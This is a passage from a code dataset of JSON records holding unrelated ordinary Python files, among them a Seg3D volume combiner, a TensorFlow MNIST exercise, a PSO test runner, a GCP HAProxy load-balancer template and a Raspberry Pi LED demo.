layergroup=get(stateid=tmp[0]+'::generation')\n \n dims.append(get(stateid=('group_'+str(layergroup)+'::dimensions')))\n origin.append(get(stateid=('group_'+str(layergroup)+'::origin')))\n spacing.append(get(stateid=('group_'+str(layergroup)+'::spacing')))\n\n dims=np.array(dims)\n origin=np.array(origin)\n spacing=np.array(spacing)\n \n mx_all=dims*spacing+origin\n mx_size=np.array([max(mx_all[:,0]),max(mx_all[:,1]),max(mx_all[:,2])])\n orig_new=np.array([min(origin[:,0]),min(origin[:,1]),min(origin[:,2])])\n spac= np.mean(spacing,axis=0)\n dims_new=np.around((mx_size-orig_new)/spac)\n \n r_mn = np.around((orig_new-origin)/spac)\n r_mx = r_mn+dims_new\n \n padded=[]\n for k in range(0,len(layers)):\n tmp_pad=resample(layerids=layers[k],x=dims_new[0],y=dims_new[1],z=dims_new[2],crop='true',range_min=r_mn[k,:],range_max=r_mx[k,:],padding='0',kernal='box')\n padded.append(tmp_pad[0])\n\n if len(layers)>26:\n raise ValueError(\"Too many layers to use in this operation.\" % len(padded))\n \n alpha=['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z']\n\n# a nieve combination method. Assumes no overlap\n express = 'RESULT=A'\n for k in range(1,len(padded)):\n express=express+'+'+alpha[k]\n\n express=express+';'\n wait_for_layer(padded[len(padded)-1])\n\n combined=arithmeticfilter(layerids=padded,expressions=express,output_type='data',preserve_data_format='true')\n\n wait_for_layer(combined)\n\n result=exportlayer(layer=combined,file_path=outfilename,exporter='[NRRD Exporter]',extension='.nrrd')\n\n print('file saved to '+outfilename)\n\n\n\ndef wait_for_layer(layer):\n #checks to make sure that the layer is available before trying operations on it.\n\n MAX_ITERATIONS=1000\n TIMEOUT=2\n c = threading.Condition()\n c.acquire()\n \n layerStatus = get(stateid=layer+\"::data\")\n counter = 1\n with c:\n while not layerStatus == \"available\":\n if counter > MAX_ITERATIONS:\n break\n counter += 1\n c.wait(TIMEOUT)\n layerStatus = get(stateid=layer+\"::data\")\n print('wainting for '+layer)\n\n","sub_path":"Python_Code/Seg3D/Combine_volumes.py","file_name":"Combine_volumes.py","file_ext":"py","file_size_in_byte":2820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"341147545","text":"import tensorflow as tf\nmnist = tf.keras.datasets.mnist\n\n###Callback Function###\nclass myCallback(tf.keras.callbacks.Callback):\n def on_epoch_end(self, epoch, logs={}):\n if(logs.get('loss')<0.01):\n print(\"\\nReached 99% accuracy so cancelling training!\")\n self.model.stop_training = True\n\n###Setup a Callback###\ncallbacks = myCallback()\n\n###Split up the data###\n(training_images, training_labels), (test_images, test_labels) = mnist.load_data()\n\n###Normalize the data###\ntraining_images = training_images / 255.0\ntest_images = test_images / 255.0\n\n##Design the Neural Network###\nconorsnn = tf.keras.models.Sequential([tf.keras.layers.Flatten(),\n tf.keras.layers.Dense(128, activation=tf.nn.relu), \n tf.keras.layers.Dense(10, activation=tf.nn.softmax)])\n\n###Compile the Neural Network###\nconorsnn.compile(optimizer = tf.train.AdamOptimizer(),\n loss = 'sparse_categorical_crossentropy',\n metrics=['accuracy'])\n \n###Train the Neural Network###\nconorsnn.fit(training_images, training_labels, epochs=15, callbacks=[callbacks])\n\n###Test the Neural Network###\nconorsnn.evaluate(test_images, test_labels)\n","sub_path":"Exercise2.py","file_name":"Exercise2.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"214698832","text":"import os\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom tools import read_pfm\n\nBASE_DIR = 'E:\\\\Projects\\\\Datasets\\\\MIDDLEBURY\\\\2005'\n\nscene_lst = os.listdir(BASE_DIR)\nfocal_length = 3740\nbaseline = 0.16\n\nfor scene in scene_lst:\n files = os.listdir('%s/%s' % (BASE_DIR, scene))\n\n disp_lst = [i for i in files if 'disp' in i]\n dmin = [i for i in files if 'txt' in i][0]\n min_ = float(open('%s/%s/dmin.txt'% (BASE_DIR, scene)).readline().strip())\n print()\n # color_lst = [i for i in files if 'disp' not in i]\n for index in range(len(disp_lst)):\n pdisp = '%s/%s/%s' % (BASE_DIR, scene, disp_lst[index])\n # pcolor = '%s/%s/%s' % (BASE_DIR, scene, color_lst[index])\n print(pdisp)\n disp = cv2.imread(pdisp)[:, :, 0]\n mask = disp != 0\n\n disp = disp + 1e-10\n disp = focal_length*baseline/disp\n disp = disp*mask\n # print(np.max(disp), np.min(disp), np.mean(disp))\n disp = disp * 1000\n disp = disp.astype(np.uint16)\n # cv2.imwrite('C:\\\\Users\\\\39796\\Desktop\\\\xxxxxx.png',disp)\n # disp = disp.astype(np.uint16)\n # plt.imshow(disp)\n # plt.show()\n","sub_path":"pytorch_version/DepthSuper-resolution/MyUtils/mani_midburry_2006.py","file_name":"mani_midburry_2006.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"398350775","text":"from tabipy import Table, TableRow, TableCell, TableHeaderRow, TableHeader\n\ndef test_simple():\n # For now, this is little more than a smoke test to check that it's not\n # erroring out.\n t = Table(TableHeaderRow('a','b','c'),\n (1, 2, 3),\n (2, 4, 6),\n )\n \n html = t._repr_html_()\n assert '= lo:\n mid = int(lo + (hi - lo) / 2)\n curr = arr[mid]\n if val < curr:\n hi = mid-1\n elif val > curr:\n lo = mid+1\n else:\n index = mid\n if index == len(arr)-1 or index == 0:\n break\n else:\n if arr[index-1] == val:\n hi = mid-1\n continue\n else:\n break\n if index >= 0:\n print('Found ' + str(val) + ' at ' + str(index) + '.')\n else:\n print('Value is not in array.')\n\n\nif __name__ == '__main__':\n if len(sys.argv) < 3:\n print('Usage: ' + sys.argv[0]+ ' [val] [array of integers]')\n exit(1)\n b = BinarySearch(sys.argv[2:], sys.argv[1])\n b.binary_search()\n","sub_path":"algorithms/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"560189689","text":"import sys \nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import * \nfrom PyQt4.QtWebKit import * \nimport time\n\nclass Printer(object):\n def __init__(self, url, name):\n # self.url = url\n # self.nam = name\n self.app = QApplication(sys.argv)\n self.web = QWebView()\n self.web.load(QUrl(url))\n self.printer = QPrinter()\n self.printer.setPageSize(QPrinter.A4)\n self.printer.setOutputFormat(QPrinter.PdfFormat)\n self.printer.setOutputFileName(name)\n def convertIt(self):\n self.web.print_(self.printer)\n print (\"convert OK\")\n QApplication.exit()\n def printpdf(self):\n QObject.connect(self.web, SIGNAL(\"loadFinished(bool)\"), self.convertIt)\n # sys.exit(self.app.exec_())\n\n\n# app = QApplication(sys.argv)\n# web = QWebView()\n# web.load(QUrl(\"https://www.quora.com/What-are-some-social-norms-one-can-intentionally-break-to-get-a-response\"))\n# # web.load(QUrl('https://www.baidu.com'))\n# printer = QPrinter()\n# printer.setPageSize(QPrinter.A4)\n# printer.setOutputFormat(QPrinter.PdfFormat)\n# printer.setOutputFileName(\"fileOK.pdf\")\n# index = 0\n# index2 = 0\n# def convertIt():\n# global index\n# index = index + 1\n# print('index1:',index)\n# web.print_(printer)\n# print (\"Pdf generated\")\n# QApplication.exit()\n# # QObject.connect(web, SIGNAL(\"loadFinished(bool)\"), convertIt)\n\n# # def pdfprinter(url, name):\n# # global web\n# # global printer\n# # global index2\n# # index2 = index2 + 1\n# # print('index2:',index2)\n# # web.load(QUrl(url))\n# # printer.setOutputFileName(name)\n# # QObject.connect(web, SIGNAL(\"loadFinished(bool)\"), convertIt)\n\n# print(\"1111111111111\")\n\n# print(12)\n# web.load(QUrl('https://www.baidu.com/'))\n# print(34)\n# printer.setOutputFileName('fileOK3.pdf')\n# # web.print_(printer)\n# b = QObject.connect(web, SIGNAL(\"loadFinished(bool)\"), convertIt)\n\n\n# print(12)\n# web.load(QUrl('https://www.baidu.com/'))\n# print(34)\n# printer.setOutputFileName('fileOK4.pdf')\n# b = QObject.connect(web, SIGNAL(\"loadFinished(bool)\"), convertIt)\n\n# # web.load(QUrl('http://blog.csdn.net/dengjianqiang2011/article/details/9260435'))\n# # printer.setOutputFileName('fileOK4.pdf')\n# # b = QObject.connect(web, SIGNAL(\"loadFinished(bool)\"), convertIt)\n\n# # web.load(QUrl('http://blog.csdn.net/raylee2007/article/details/48437661'))\n# # printer.setOutputFileName('fileOK5.pdf')\n# # b = QObject.connect(web, SIGNAL(\"loadFinished(bool)\"), convertIt)\n\n\n\n\n\n\n\n\n# # time.sleep(10)\n# # print(\"2222222222222\")\n# # pdfprinter('http://blog.csdn.net/whiterbear/article/details/50232637','fileOK4.pdf')\n# # time.sleep(10)\n# # print(\"3333333333333\")\n# # pdfprinter('http://blog.csdn.net/raylee2007/article/details/48437661','fileOK5.pdf')\n\n\n\n\n\n# sys.exit(app.exec_())","sub_path":"SpiderDemo/qtprintLib.py","file_name":"qtprintLib.py","file_ext":"py","file_size_in_byte":2792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"520340847","text":"# Copyright 2015 Google Inc. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Creates a load balancer using HAProxy.\"\"\"\n\n\ndef GenerateConfig(context):\n \"\"\"Generate configuration.\"\"\"\n\n lb_name = ''.join([context.env['deployment'],\n '-',\n context.env['name'],\n '-internal-lb'])\n\n metadata = {\n 'algorithm': context.properties['algorithm'],\n 'app-port': context.properties['app-port'],\n 'port': context.properties['port'],\n 'groups': ' '.join(context.properties['groups'])\n }\n\n resources = [{\n 'name': lb_name,\n 'type': 'instance.py',\n 'properties': {\n 'machine-type': context.properties['machine-type'],\n 'metadata': metadata,\n 'metadata-from-file': {\n 'startup-script': 'haproxy-startup-script.sh'\n },\n 'zone': context.properties['zone']\n }\n }]\n\n return {\n 'resources': resources,\n 'outputs': [{\n 'name': 'address',\n 'value': '$(ref.' + lb_name + '.address)'\n }]\n }\n\n","sub_path":"examples/v2/internal_lb_haproxy/internal-lb.py","file_name":"internal-lb.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"262803517","text":"from django.utils.translation import ugettext_lazy as _\nfrom django.core.urlresolvers import reverse_lazy\nfrom django.core.urlresolvers import reverse\n\nfrom horizon import exceptions\nfrom horizon import tables\nfrom horizon.utils import memoized\n\nfrom nuage_horizon.api import neutron\n\nfrom nuage_horizon.dashboards.project.gateways \\\n import tables as gateway_tables\nfrom nuage_horizon.dashboards.project.gateways.ports \\\n import tables as port_tables\n\n\nclass IndexView(tables.DataTableView):\n table_class = gateway_tables.GatewaysTable\n template_name = 'nuage/gateways/index.html'\n\n def get_data(self):\n try:\n gws = neutron.nuage_gateway_list(self.request)\n except Exception:\n gws = []\n msg = _('Nuage Gateway list can not be retrieved.')\n exceptions.handle(self.request, msg)\n return gws\n\n\nclass DetailView(tables.DataTableView):\n table_class = port_tables.PortsTable\n template_name = 'nuage/gateways/detail.html'\n page_title = _(\"Gateway Details: {{ gateway.name }}\")\n failure_url = reverse_lazy('horizon:project:gateways:index')\n\n def get_data(self):\n try:\n gw = self._get_gateway_data()\n if gw:\n ports = neutron.nuage_gateway_port_list(self.request, gw.id)\n else:\n ports = []\n except Exception:\n ports = []\n msg = _('Nuage Gateway Port list can not be retrieved.')\n exceptions.handle(self.request, msg)\n return ports\n\n @memoized.memoized_method\n def _get_gateway_data(self):\n try:\n gw_id = self.kwargs['gateway_id']\n gateway = neutron.nuage_gateway_get(self.request, gw_id)\n except Exception:\n gateway = None\n msg = _('Gateway can not be retrieved.')\n exceptions.handle(self.request, msg, redirect=self.failure_url)\n return gateway\n\n def get_context_data(self, **kwargs):\n context = super(DetailView, self).get_context_data(**kwargs)\n gateway = self._get_gateway_data()\n context[\"gateway\"] = gateway\n table = gateway_tables.GatewaysTable(self.request)\n context[\"url\"] = self.get_redirect_url()\n context[\"actions\"] = table.render_row_actions(gateway)\n return context\n\n @staticmethod\n def get_redirect_url():\n return reverse_lazy('horizon:project:gateways:index')\n","sub_path":"nuage_horizon/dashboards/project/gateways/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"529800227","text":"import logging\nimport os\nimport numpy as np\nimport pickle\nimport random\nimport sys\nimport tempfile as tmp\n\nfrom genens.render.plot import export_plot\nfrom genens.workflow.evaluate import SampleCrossValEvaluator, CrossValEvaluator\n\nif sys.platform == 'darwin':\n os.environ['OBJC_DISABLE_INITIALIZE_FORK_SAFETY'] = 'YES'\nos.environ['JOBLIB_TEMP_FOLDER'] = tmp.gettempdir()\nos.environ['OMP_NUM_THREADS'] = '1'\nos.environ['OPENBLAS_NUM_THREADS'] = '1'\nos.environ['MKL_NUM_THREADS'] = '1'\nfrom genens import GenensClassifier, GenensRegressor\n\nfrom sklearn.metrics import get_scorer\n\nfrom frameworks.shared.callee import call_run, result, output_subdir, utils\n\nfrom typing import Union\n\n\nlog = logging.getLogger(__name__)\n\n\ndef run(dataset, config):\n log.info(\"\\n**** genens ****\\n\")\n\n is_classification = config.type == 'classification'\n\n if not is_classification:\n Warning(\"Regression not supported.\")\n return None\n\n # Mapping of benchmark metrics to TPOT metrics\n metrics_mapping = {\n 'acc': get_scorer('accuracy'),\n 'auc': get_scorer('roc_auc'),\n 'f1': get_scorer('f1'),\n 'logloss': get_scorer('neg_log_loss'),\n 'mae': get_scorer('neg_mean_absolute_error'),\n 'mse': get_scorer('neg_mean_squared_error'),\n 'msle': get_scorer('neg_mean_squared_log_error'),\n 'r2': get_scorer('r2')\n }\n scoring_metric = metrics_mapping[config.metric] if config.metric in metrics_mapping else None\n if scoring_metric is None:\n raise ValueError(\"Performance metric {} not supported.\".format(config.metric))\n\n X_train, X_test = dataset.train.X_enc, dataset.test.X_enc\n y_train, y_test = dataset.train.y_enc, dataset.test.y_enc\n\n training_params = {k: v for k, v in config.framework_params.items() if not k.startswith('_')}\n n_jobs = config.framework_params.get('_n_jobs', config.cores) # useful to disable multicore, regardless of the dataset config\n\n sample_size = config.framework_params.get('_sample_size', None)\n if sample_size is not None:\n evaluator = SampleCrossValEvaluator(sample_size=sample_size, per_gen=True, cv_k=5)\n else:\n evaluator = CrossValEvaluator(cv_k=5)\n\n print(f\"Chosen sample size: {sample_size}.\")\n print(f'cv_k: {evaluator.cv_k}')\n\n training_params['evaluator'] = evaluator\n\n runtime_s = config.max_runtime_seconds\n if runtime_s >= 600:\n runtime_s -= 5 * 60 # avoid premature process termination\n elif runtime_s > 10:\n runtime_s -= 5\n\n if not config.framework_params.get('disable_logging', True):\n log_path = os.path.join(output_subdir('logs', config), 'evo_log_file.txt')\n else:\n log_path = None\n\n print(f\"Setting time limit to {runtime_s} seconds.\")\n\n log.info('Running genens with a maximum time of %ss on %s cores, optimizing %s.',\n runtime_s, n_jobs, scoring_metric)\n\n if config.seed is not None:\n # random state is yet to be unified in genens\n np.random.seed(config.seed)\n random.seed(config.seed)\n\n print(f'Training params: {training_params}')\n\n estimator = GenensClassifier if is_classification else GenensRegressor\n genens_est = estimator(n_jobs=n_jobs,\n max_evo_seconds=runtime_s,\n scorer=scoring_metric,\n log_path=log_path,\n **training_params)\n\n with utils.Timer() as training:\n genens_est.fit(X_train, y_train)\n\n log.info('Predicting on the test set.')\n\n best_pipe = genens_est.get_best_pipelines()[0]\n best_pipe.fit(X_train, y_train)\n\n predictions = best_pipe.predict(X_test)\n\n try:\n probabilities = best_pipe.predict_proba(X_test) if is_classification else None\n except AttributeError:\n target_values_enc = dataset.target.label_encoder.transform(dataset.target.values)\n probabilities = utils.Encoder('one-hot', target=False, encoded_type=float).fit(target_values_enc).transform(predictions)\n\n save_artifacts(genens_est, config)\n\n return result(output_file=config.output_predictions_file,\n predictions=predictions,\n truth=y_test,\n probabilities=probabilities,\n target_is_encoded=is_classification,\n models_count=len(genens_est.get_best_pipelines()),\n training_duration=training.duration)\n\n\ndef save_artifacts(estimator: Union[GenensClassifier, GenensRegressor], config):\n try:\n artifacts = config.framework_params.get('_save_artifacts', False)\n\n if 'pickle_models' in artifacts:\n models_dir = os.path.join(output_subdir('pickle_models', config))\n\n # pickle top 3 best pipelines\n for i, pipe in enumerate(estimator.get_best_pipelines()):\n with open(models_dir + '/pipeline{}.pickle'.format(i), 'wb') as pickle_file:\n pickle.dump(pipe, pickle_file, pickle.HIGHEST_PROTOCOL)\n\n if 'models' in artifacts:\n models_dir = os.path.join(output_subdir('models', config))\n\n # top 3 individual fitness values\n with open(models_dir + '/ind-fitness.txt', 'w+') as out_file:\n best_inds = estimator.get_best_pipelines(as_individuals=True)\n\n for i, ind in enumerate(best_inds):\n out_file.write('Individual {}: Score {}\\n'.format(i, ind.fitness.values))\n # individual tree\n\n if 'models_png' in artifacts:\n from genens.render.graph import create_graph\n\n models_dir = os.path.join(output_subdir('models', config))\n for i, ind in enumerate(best_inds):\n create_graph(ind, models_dir + '/graph{}.png'.format(i))\n\n if 'log' in artifacts:\n log_dir = os.path.join(output_subdir('logs', config))\n\n # write logbook string representation to output dir\n with open(log_dir + '/logbook.txt', 'w+') as log_file:\n log_file.write(estimator.logbook.__str__() + '\\n')\n\n # evolution plot\n export_plot(estimator, log_dir + '/result.png')\n\n except:\n log.debug(\"Error when saving artifacts.\", exc_info=True)\n\nif __name__ == '__main__':\n call_run(run)","sub_path":"frameworks/genens/exec.py","file_name":"exec.py","file_ext":"py","file_size_in_byte":6263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"36393533","text":"from typing import Iterator\n\nfrom common.datetime import get_current_year\nfrom common.decimal import Decimal\nfrom entities.taxes_policy.models import TaxesPolicy, TaxesPolicyRange\n\n\nclass Tax: # Full tax from annual salary including all tax policy range lines for selected year.\n annual_salary_amount: Decimal\n year: int\n _range_lines: 'TaxRangeLinesList[TaxRangeLine]' = None\n\n def __init__(self, annual_salary_amount: Decimal, year: int = None):\n self.annual_salary_amount = Decimal(annual_salary_amount)\n self.year = year or get_current_year()\n\n @property\n def range_lines(self):\n if self._range_lines is None: # lazy\n taxes_policy = TaxesPolicy.objects.get_for_year(self.year)\n self._range_lines = TaxRangeLinesList(\n TaxRangeLine(tax_policy_range=policy_range, annual_salary_amount=self.annual_salary_amount)\n for policy_range in taxes_policy.ranges.all()\n )\n return self._range_lines\n\n\nclass TaxRangeLine: # Tax from annual salary for a special taxes policy range line.\n policy_range: TaxesPolicyRange\n amount: Decimal\n\n def __init__(self, tax_policy_range: TaxesPolicyRange, annual_salary_amount: Decimal):\n self.policy_range = tax_policy_range\n self._recalculate_amount(annual_salary_amount)\n\n def _recalculate_amount(self, annual_salary_amount: Decimal):\n calculated_amount = Decimal(0)\n if annual_salary_amount > self.policy_range.amount_from:\n\n if annual_salary_amount <= self.policy_range.amount_to:\n amount_before_range_ends = annual_salary_amount\n else:\n amount_before_range_ends = self.policy_range.amount_to\n\n amount_in_range = amount_before_range_ends - self.policy_range.amount_from\n calculated_amount = amount_in_range / 100 * self.policy_range.percent\n\n self.amount = calculated_amount\n\n\nclass TaxRangeLinesList(list):\n def __iter__(self) -> Iterator['TaxRangeLine']: return super(TaxRangeLinesList, self).__iter__() # for type hints\n\n @property\n def total_amount(self):\n result = Decimal(0)\n for range_line in self:\n result += Decimal(range_line.amount)\n return result\n","sub_path":"src/entities/tax/models/tax.py","file_name":"tax.py","file_ext":"py","file_size_in_byte":2265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"328526879","text":"import numpy as np\nimport math\nimport sys\nsys.path.append('../')\nfrom pso.local_best_pso import local_best_pso\nfrom common.functions.single_objective import *\n\n# Run Local Best PSO 20 times on each function and take an average\n\ndef run_20(n, dims, c1, c2, w, k, iters, obj_func):\n '''\n n: Number of particles in swarm\n dims: Number of dimensions\n c1: Cognitive weight (how much each particle references their memory)\n c2: Social weight (how much each particle references swarm/group memory)\n w: Velocity weight\n k: number of nearest neighbors to evaluate\n iters: Number of iterations\n '''\n vals = []\n for i in range(20):\n vals.append(local_best_pso(n, dims, c1, c2, w, k, iters, obj_func))\n print(\"Mean value:\",np.mean(vals))\n\nalgo = local_best_pso\n\ndef run_20(n, dims, c1, c2, w, k, iters, obj_func, val_min, val_max):\n '''\n n: Number of particles in swarm\n dims: Number of dimensions\n c1: Cognitive weight (how much each particle references their memory)\n c2: Social weight (how much each particle references swarm/group memory)\n w: Velocity weight\n iters: Number of iterations\n '''\n vals = []\n for i in range(20):\n vals.append(algo(n, dims, c1, c2, w, k, iters, obj_func,\\\n val_min, val_max))\n print(\"Mean value:\",np.mean(vals))\n\ndef run_all_tests(obj_func, val_min, val_max):\n n = 30\n dims = 2\n c1 = 0.5\n c2 = 0.3\n w = 0.9\n k = 4\n iters = 2000\n\n print(\"--------------------------\")\n print(\"Testing %s\" %obj_func)\n print(\"Single run test:\", algo(n, 2, c1, c2, w, k, iters, obj_func,\\\n val_min, val_max))\n print(\"Run 20:\", run_20(n, 2, c1, c2, w, k, iters, obj_func, \\\n val_min, val_max))\n\nrun_all_tests(sphere_func, -5.12, 5.12)\nrun_all_tests(rosenbrock_func, -2.048, 2.048)\nrun_all_tests(ackley_func, -32.768, 32.768)\nrun_all_tests(griewank_func, -600, 600)\nrun_all_tests(rastrigin_func, -5.12, 5.12)\nrun_all_tests(weierstrass_func, -0.5, 0.5)\n","sub_path":"pso/run_local_best.py","file_name":"run_local_best.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"34427004","text":"# -*-coding: utf-8 -*-\nfrom test.test__locale import candidate_locales\n\n# 返回结果,不包含重复的组合,每个数可以重复使用。 dfs\ndef combineSum(candidates,target):\n candidates.sort()\n res = []\n dfs(candidates,target,0,[],res)\n return res\n\n\ndef dfs(candidates,target,index,path,res):\n if target<0:\n return \n if target == 0:\n res.append(path)\n return\n for i in range(index,len(candidates)):\n dfs(candidates,target-candidates[i], i,path+[candidates[i]],res)\n \n\nprint (combineSum([2,3,6,7], 7))\n\n# 返回所有组合的个数,不同顺序的组合属于不同的解\n\n#动态规划:\n\ndef combineNum1(nums,target):\n nums.sort()\n dp = [0]*(target+1)\n dp[0] = 1\n \n for i in range(1,target+1):\n for num in nums:\n if num > target:\n break\n dp[i] += dp[i-num]\n \n \n return dp[target]\n# 组合只能用k个数,每个数只能用一次\ndef combinationSum3(self, k, n):\n res = []\n self.dfs(xrange(1,10), k, n, 0, [], res)\n return res\n \ndef dfs(self, nums, k, n, index, path, res):\n if k < 0 or n < 0: # backtracking \n return \n if k == 0 and n == 0: \n res.append(path)\n for i in xrange(index, len(nums)):\n self.dfs(nums, k-1, n-nums[i], i+1, path+[nums[i]], res)","sub_path":"workspace/新建文件夹/Leetcode/review/CombinationSum.py","file_name":"CombinationSum.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"64313183","text":"import tensorflow as tf\nimport numpy as np\nimport scipy.signal\n\ndef n_step_r(v, all_r, gamma):\n \"\"\"Estimate q values for a trajectory\"\"\"\n n_steps = []\n for r in all_r[::-1]:\n v = r + gamma * v\n n_steps.append(v)\n n_steps.reverse()\n return n_steps\n\ndef discounted_rs(rs, gamma):\n # copied over\n return scipy.signal.lfilter([1], [1, -gamma], rs[::-1], axis=0)[::-1]\n\ndef gae(rs, vs, gamma, lam):\n T = len(rewards)\n lastgaelam = 0\n gaelam = np.empty(T, 'float32')\n tdlamret = np.empty(T, 'float32')\n for t in reversed(range(T)):\n nonterminal = 1 - (t == T - 1)\n delta = rs[t] + gamma * vs[t+1] * nonterminal - vs[t]\n gaelam[t] = lastgaelam = delta + gamma * lam * nonterminal * lastgaelam\n tdlamret = gaelam + vs\n return gaelam, tdlamret\n\n\ndef traj(pi, env, T):\n obses, acts, rs, ds = [], [], [], []\n obs = env.reset()\n for t in range(T):\n act = pi(np.expand_dims(obs, axis=0))[0]\n obses.append(obs)\n acts.append(act)\n obs, r, d, _ = env.step(act)\n rs.apped(r)\n ds.append(d)\n if d: break\n return np.array(obses), np.array(acts), np.array(rs), np.array(ds)\n\ndef rollout(pi, env, horizon, T):\n paths = []\n t = 0\n while t < T:\n obses, acts, rs, ds = [], [], [], []\n obs = env.reset()\n for i in range(horizon):\n t += 1\n act = pi(np.expand_dims(obs, axis=0))[0]\n obses.append(obs)\n acts.append(act)\n obs, r, d, _ = env.step(act)\n rs.append(r)\n ds.append(d)\n if d:\n obses = np.array(obses)\n acts = np.array(acts)\n rs = np.array(rs)\n ds = np.array(ds)\n path = {'obses': obses, 'acts': acts, 'rs': rs, 'ds': ds}\n paths.append(path)\n break\n return paths\n\ndef make_batch(rollout, key):\n batch = np.concatenate([path[key] for path in rollout])\n return batch\n","sub_path":"common/rl_util.py","file_name":"rl_util.py","file_ext":"py","file_size_in_byte":2014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"604794947","text":"import os\nimport glob as gb\nprint('h')\npng_path = os.path.join('/home/zackzhh/my_space/yolo3/pytorch-yolo-v3/JPEGImages/*.png')\nimg_path = gb.glob(png_path) \nfor img in img_path:\n\tprint('start')\n\tfilepath,filename = os.path.split(img)\n\tfilename,_ = os.path.splitext(filename)\n\tnewpath = os.path.join(filepath,filename+'.jpg')\n\tprint(img,newpath)\n\tos.rename(img,newpath)\n","sub_path":"png2jpg.py","file_name":"png2jpg.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"364362876","text":"#LED demo for new computer science students.\n#Written by Jake Charman\n\n#Import required libraries\nimport RPi.GPIO as GPIO\nfrom time import sleep\nfrom random import randint\n\n#Set up the GPIO settings\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\n\n#Define the pins used\npins = [14, 15, 18, 23, 24]\n\n#Set all the pins as outputs\nfor pin in pins:\n GPIO.setup(pin, GPIO.OUT)\n\n#Flash all LEDs \ndef allFlash():\n #Twice...\n for i in range(0, 2):\n #Turn on all the LEDs \n for pin in pins:\n GPIO.output(pin, True)\n #Wait for one second\n sleep(1)\n #Turn off all the LEDs\n for pin in pins:\n GPIO.output(pin, False)\n #Wait for one second\n sleep(1)\n\n#Flash LEDs in sequence\ndef chaseLights():\n #Five times...\n for i in range(0, 5):\n #For each pin defined in pins\n for pin in pins:\n #Turn the LED on\n GPIO.output(pin, True)\n #Wait for 0.05s\n sleep(0.05)\n #Trun off the LED\n GPIO.output(pin, False)\n\n#Flash LEDs in sequence then all at once\ndef chaseFlash():\n #Twice...\n for i in range(0, 2):\n #Flash LEDs in sequence two times\n for i in range(0, 2):\n #for each pin defined in pins\n for pin in pins:\n #Turn on the LED\n GPIO.output(pin, True)\n #Wait for 0.25s\n sleep(0.25)\n\n #Flash all LEDs twice\n for i in range(0, 2):\n #Turn off all LEDs\n for pin in pins:\n GPIO.output(pin, False)\n #Wait for 0.5s \n sleep(0.5)\n #Turn on all LEDs\n for pin in pins:\n GPIO.output(pin, True)\n\n #Wait 0.5s\n sleep(0.5)\n\n #Turn off all LEDs\n for pin in pins:\n GPIO.output(pin, False)\n\ntry:\n #Main loop\n while True:\n\n #Generate a random integer\n selection = randint(0, 2)\n\n #If the random number equals 0\n if selection == 0:\n #Run the function to flash all LEDs\n allFlash()\n\n #If the random number equals 1\n elif selection == 1:\n #Run the function to flash LEDs in sequence\n chaseLights()\n\n #If the random number equals 2\n elif selection == 2:\n #Run the function to flash LEDs in sequence then all together.\n chaseFlash()\n\n #If the random number equals anything else\n else:\n #Restart the loop\n pass\n\n#If ctrl+c is pressed\nexcept KeyboardInterrupt:\n #Clear all GPIO settings\n GPIO.cleanup()\n","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":2656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"296121331","text":"\n\nimport os\nimport sys\nimport wx\nimport numpy as np\nimport matplotlib\nmatplotlib.interactive(False)\n#Use the WxAgg back end. The Wx one takes too long to render\nmatplotlib.use('WXAgg')\nfrom sas.sasgui.guiframe.local_perspectives.plotting.SimplePlot import PlotFrame\n#import matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport matplotlib.colors as colors\nfrom sas.sasgui.guiframe.events import StatusEvent\nfrom sas.sasgui.perspectives.calculator.calculator_widgets import InputTextCtrl\nfrom sas.sascalc.dataloader.data_info import Data2D\nfrom sas.sascalc.dataloader.data_info import Detector\nfrom sas.sascalc.dataloader.manipulations import reader2D_converter\nfrom sas.sasgui.guiframe.documentation_window import DocumentationWindow\n\n_BOX_WIDTH = 60\nIS_WIN = True\nif sys.platform.count(\"win32\") > 0:\n _DIALOG_WIDTH = 400\nelse:\n _DIALOG_WIDTH = 480\n IS_WIN = False\n\nclass ImageView:\n \"\"\"\n Open 